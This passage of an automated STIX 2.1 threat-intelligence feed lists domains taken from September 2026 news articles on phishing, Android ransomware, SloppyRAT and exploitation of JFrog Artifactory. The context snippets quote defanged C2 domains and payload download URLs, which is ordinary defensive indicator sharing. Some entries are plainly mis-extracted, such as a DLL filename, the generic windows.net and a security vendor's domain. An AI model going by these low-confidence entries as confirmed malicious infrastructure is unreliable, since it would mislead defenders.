News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bddbf685-b05a-4b85-bd5f-529d1baf3785","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: eemusicclass.co.uk","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: address used to send campaign emails Email address contact@eemusicclass[.]co[.]uk Sender email address used to send campaign emails Email","pattern":"[domain-name:value = 'eemusicclass.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a1893e2-87e5-4958-92bd-55faa323856b","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lifeones.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@lifeones[.]com Sender email address used to send campaign emails Domain","pattern":"[domain-name:value = 'lifeones.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2bb26160-dbb1-4a85-b84f-9246072b6951","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lohnsteuerhilfe-aktuell-verein.de","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@lohnsteuerhilfe-aktuell-verein[.]de Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'lohnsteuerhilfe-aktuell-verein.de']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3885530e-4adb-4bd9-8c2d-bcbba32b7606","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lumalisboa.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: address used to send campaign emails Email address no-reply@lumalisboa[.]com Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'lumalisboa.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--79e9c501-8198-4c17-8052-ce0314e93e6e","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: mctci.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: address used to send campaign emails Email address noreply@mctci[.]com Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'mctci.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2591d882-e62e-4de5-94e5-cdcd0a87db4f","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: nuf.co.jp","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@nuf[.]co[.]jp Sender email address used to send campaign emails Email","pattern":"[domain-name:value = 'nuf.co.jp']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--99d20ded-c3e3-4377-8ac4-d458d70248df","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: service-nowinc.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: rs of compromise (IoCs):- Type Indicator Description Domain service-nowinc[.]com Domain impersonating ServiceNow Email address gomez@servi","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--94685668-3bc6-4908-bd92-55e097bd297f","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: tivityhealth.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@tivityhealth[.]com Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'tivityhealth.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--923d2360-cfa5-4200-9cea-74889c7ceda1","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: tovimbatista.pt","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@tovimbatista[.]pt Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'tovimbatista.pt']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--371fccb3-5e30-4c85-aa30-958e4e3d596c","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: uinsure.co.uk","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: associated with a bank account Email address notifications@uinsure[.]co[.]uk Sender email address used to send campaign emails Email","pattern":"[domain-name:value = 'uinsure.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4b1a17f1-b2df-4a37-88d3-b885a849711b","created":"2026-09-11T12:14:12.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: apimantax.otax.fun","description":"Seen in \"New Android Ransomware Records Screens, Steals OTPs and Secretly Takes Photos of Victims\" (Cyber Security News). Context: bound traffic. Type Indicator Description C2 domain hxxps://apimantax[.]otax[.]fun Active command-and-control domain dynamically retrieved","pattern":"[domain-name:value = 'apimantax.otax.fun']","pattern_type":"stix","valid_from":"2026-09-11T12:14:12.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-android-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d126968-8aaa-4f49-ae3f-9b124cf8bab4","created":"2026-09-11T09:59:29.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: gitclone.org","description":"Seen in \"Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access\" (GBHackers). Context: xploiting CVE-2026-82329 2026-09-02 Not provided hxxp://log.gitclone[.]org:45678/smtp Payload download URL following CVE-2026-42018/","pattern":"[domain-name:value = 'gitclone.org']","pattern_type":"stix","valid_from":"2026-09-11T09:59:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-jfrog-artifactory-flaws/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e2f89533-3978-4428-bcb2-c528e551e937","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: backup-ubt.s3.us-east-1.amazonaws.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: ws[.]net/dpp1/hostfxr[.]dll SloppyRAT DLL URL URL hxxps[://]backup-ubt[.]s3[.]us-east-1[.]amazonaws[.]com/hostfxr[.]dll SloppyRAT DLL URL Domain stro7121.blo","pattern":"[domain-name:value = 'backup-ubt.s3.us-east-1.amazonaws.com']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a0f708af-acb2-4b4a-ac39-2ea1783ecebf","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hostfxr.dll","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: L URL hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/hostfxr[.]dll SloppyRAT DLL URL URL hxxps[://]backup-ubt[.]s3[.]us-east","pattern":"[domain-name:value = 'hostfxr.dll']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--472e8799-bb44-4658-926a-aa9c3a294cc0","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: linked4x.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: fffa67744812d73ad98eb config.py Python script Domain finger.linked4x[.]com ClickFix script domain Domain skipraid[.]com CastleLoader","pattern":"[domain-name:value = 'linked4x.com']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c792e0f1-66ac-4a0f-a04b-09dc723aa46e","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: skipraid.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: Domain finger.linked4x[.]com ClickFix script domain Domain skipraid[.]com CastleLoader domain URL hxxps[://]skipraid[.]com/dsVGmQTr","pattern":"[domain-name:value = 'skipraid.com']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--801a13bd-6291-442c-bff1-d9fcc5175ba4","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: stro7121.blob.core.windows.net","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: id[.]com/dsVGmQTrzX/default2 CastleLoader URL URL hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/config.py Python loader URL URL hxxps[://]stro","pattern":"[domain-name:value = 'stro7121.blob.core.windows.net']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--76b4a497-7e5a-4435-b1cc-0bc975ae7d6f","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: telephoneip.net","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: ible; DLLMemLoader/1.0) Python loader User-Agent Domain api.telephoneip[.]net SloppyRAT C2 domain Domain api.truesmart[.]org SloppyRAT","pattern":"[domain-name:value = 'telephoneip.net']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d9fd58da-1e36-4ec4-92db-92eda4ded36f","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: truesmart.org","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: Domain api.telephoneip[.]net SloppyRAT C2 domain Domain api.truesmart[.]org SloppyRAT C2 domain Note: IP addresses and domains are in","pattern":"[domain-name:value = 'truesmart.org']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b5e07b3f-1837-450a-9fe1-b0220f01ee44","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: windows.net","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: m/hostfxr[.]dll SloppyRAT DLL URL Domain stro7121.blob.core.windows[.]net Python downloader C2 IP address 62.106.66[.]148:443 Slopp","pattern":"[domain-name:value = 'windows.net']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b92de31d-b4e2-490b-9e99-f6174ae0207e","created":"2026-09-11T08:17:33.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: gitclone.org","description":"Seen in \"JFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control\" (Cyber Security News). Context: .184.111[.]69 , 64.207.232[.]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / Hash","pattern":"[domain-name:value = 'gitclone.org']","pattern_type":"stix","valid_from":"2026-09-11T08:17:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/jfrog-artifactory-vulnerabilities-actively-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--388f50e0-0764-41da-adfb-9cebda2a9100","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: domainlify.net","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: t in the fake invoice as a contact address. Another domain, domainlify[.]net, was used in Reply-To fields. The short preparation perio","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a1defa12-a0d3-428b-90f1-b31e4f83ade7","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: eemusicclass.co.uk","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: uerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address","pattern":"[domain-name:value = 'eemusicclass.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2f8ab29c-16e0-4d7b-90e4-f34d0e952192","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lifeones.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address used to send out email","pattern":"[domain-name:value = 'lifeones.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--01a30613-be9e-452b-8c5b-873cf432b6e5","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lohnsteuerhilfe-aktuell-verein.de","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: umalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk inf","pattern":"[domain-name:value = 'lohnsteuerhilfe-aktuell-verein.de']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--182e26eb-dd51-41e2-9482-561911caa7c9","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lumalisboa.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: ications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhil","pattern":"[domain-name:value = 'lumalisboa.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d815018b-b167-496b-aa08-6b5b40252246","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: mctci.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: k info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]","pattern":"[domain-name:value = 'mctci.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97d87a0c-24cf-4b56-85a6-c97b02b6372e","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: nuf.co.jp","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: th[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbati","pattern":"[domain-name:value = 'nuf.co.jp']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a41e1a66-38dd-48a4-a158-c622539eba52","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: service-nowinc.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: onsumer goods’ and others (Source : Microsoft). One domain, service-nowinc[.]com, was registered on July 31, shortly before the phishing a","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b1c3e044-20c8-4f34-80d7-b7ef9ffddd57","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: tivityhealth.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: ated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]","pattern":"[domain-name:value = 'tivityhealth.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0d8284b2-7cc7-4351-9731-5c3a94594727","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: tovimbatista.pt","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email","pattern":"[domain-name:value = 'tovimbatista.pt']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f98657fa-7e31-4887-affc-43f1858990c4","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: uinsure.co.uk","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: ss Email address associated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com norep","pattern":"[domain-name:value = 'uinsure.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d52c661-235b-45ef-9aa5-0edf7fa48c76","created":"2026-09-11T07:14:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: noht1ng.top","description":"Seen in \"China-Linked UNC3569 Exploited Sogou Input Method Flaw to Deploy GRAYRABBIT Backdoor\" (The Hacker News). Context: il.uaiubifas[.]top backdoor command server, port 443 Domain noht1ng[.]top hosted the exploit page IP 8.218.50[.]207 staging server,","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-11T07:14:09.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/china-linked-unc3569-exploited-sogou.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d4879237-a650-42d4-bd4a-488a8afb2f9e","created":"2026-09-11T07:14:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: uaiubifas.top","description":"Seen in \"China-Linked UNC3569 Exploited Sogou Input Method Flaw to Deploy GRAYRABBIT Backdoor\" (The Hacker News). Context: hind is GRAYRABBIT. The backdoor reaches its server at mail.uaiubifas[.]top on port 443, and the traffic there is plain TCP scrambled","pattern":"[domain-name:value = 'uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-11T07:14:09.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/china-linked-unc3569-exploited-sogou.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--78173c5b-7dd5-40a0-a403-e7df06b5db56","created":"2026-09-11T07:14:05.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: apimantax.otax.fun","description":"Seen in \"Mantax OTAX Android Ransomware Spies on Users, Steals OTPs and Encrypts Files\" (GBHackers). Context: Mantax OTAX Android Ransomware Zimperium identified hxxps://apimantax[.]otax[.]fun as a C2-related domain in its analysis and published as","pattern":"[domain-name:value = 'apimantax.otax.fun']","pattern_type":"stix","valid_from":"2026-09-11T07:14:05.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/mantax-otax-android-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--936f05cc-5261-4ffe-9d47-6898a97ee5c3","created":"2026-09-11T07:11:14.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hunt.io","description":"Seen in \"UK Council Attack Linked to Mass Exploitation of SonicWall Flaw\" (Security Affairs). Context: e automated campaigns was effectively less than three days. Hunt.io’s AttackCapture system crawled the attacker’s open director","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-11T07:11:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security 